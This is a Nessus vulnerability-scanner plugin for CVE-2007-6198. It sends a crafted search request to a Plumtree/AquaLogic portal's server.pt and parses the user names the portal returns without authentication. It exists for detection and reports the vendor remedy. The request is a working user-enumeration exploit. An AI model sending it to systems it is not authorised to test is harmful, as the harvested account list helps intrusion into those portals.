Vulnerabilities > CVE-2007-6198 - Unspecified vulnerability in BEA Aqualogic Interaction

#
# (C) Tenable Network Security, Inc.
#



include("compat.inc");

if (description)
{
  script_id(29187);
  script_version("1.12");

  script_cve_id("CVE-2007-6198");
  script_bugtraq_id(26620);

  script_name(english:"Plumtree Portal User Object User Enumeration");
  script_summary(english:"Searches for Plumtree portal user objects");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains an application affected by an
information disclosure vulnerability." );
 script_set_attribute(attribute:"description", value:
"The version of the Plumtree portal included with BEA AquaLogic
Interaction / Plumtree Foundation and installed on the remote host
allows an attacker to obtain a list of users defined to the portal
through its search facility.  This may aide in further attacks against
the affected application." );
 # https://web.archive.org/web/20080908084124/http://procheckup.com/Vulnerability_PR06-11.php
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?d66de917" );
 script_set_attribute(attribute:"see_also", value:"http://dev2dev.bea.com/pub/advisory/254" );
 script_set_attribute(attribute:"solution", value:
"Edit object security and set access privilege to 'None' for Guest or
Everyone user accounts as discussed in the vendor advisory above." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2007/12/04");
 script_cvs_date("Date: 2018/07/24 18:56:11");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();


  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include ("data_protection.inc");

port = get_http_port(default:80, embedded: 0);

search = "*";
max_results = 10;


# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/portal", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to exploit the issue.
  r = http_send_recv3(method:"GET", port: port,
    item:string(
      dir, "/server.pt?",
      "in_ra_groupoperator_1=and&",
      "in_hi_userid=1&",
      "in_hi_req_objtype=1&",          # 1 => Users object type
      "space=SearchResult&",
      "in_tx_fulltext=", search, "&",
      "in_hi_groupoperator_1=and&",
      "parentid=1&",
      "in_hi_req_apps=1&",
      "cached=false&",
      "control=advancedstart&",
      "in_hi_revealed_1=0&",
      "in_hi_req_page=", max_results, "&",
      "in_hi_depth_1=0&",
      "in_hi_totalgroups=1&",
      "parentname=AdvancedSearch&",
      "in_ra_topoperator=and" ));
  if (isnull(r)) exit(0);
  res = r[2];

  # There's a problem if we found some users.

  if (
    '="ReorganizeResults"' >< res &&
    '<b>Users</b>' >< res &&
    (
      'One result from your search' >< res ||
      'Results from your search:' >< res
    )
  )
  {
    info = "";
    nusers = 0;

    form = strstr(res, '="ReorganizeResults"') - '="ReorganizeResults"';
    form = form - strstr(form, "</form>");

    pat = '<a href="[^>]+><b>([^<]+)<.+<span[^>]+>(<i>)?([^<]+)';
    matches = egrep(pattern:pat, string:form);
    if (matches)
    {
      foreach match (split(matches))
      {
        match = chomp(match);
        val = eregmatch(pattern:pat, string:match);
        # nb: ignore pseudo-accounts.
        if (!isnull(val) && val[1] !~ "^(Default Profile|Guest|Nobody)$")
        {
          nusers++;

          user = val[1];
          user = data_protection::sanitize_user_enum(users:user);
          summary = val[3];
          summary = str_replace(find:"&nbsp;", replace:" ", string:summary);

          info += '  - ' + user + '\n' +
                  '    ' + summary + '\n' +
                  '\n';
        }
      }
    }

    if (info)
    {
      report = string(
        "\n",
        "Here is a list of Plumtree Portal users defined to the remote host and\n",
        "discovered by searching for User objects matching '", search, "' :\n",
        "\n",
        info
      );
      if (nusers >= max_results)
        report = string(
          report,
          "\n",
          "Note that there may actually be more users, but Nessus limited\n",
          "the search to ", max_results, " results.\n"
        );

        security_warning(port:port, extra:report);
        exit(0);
    }
  }
}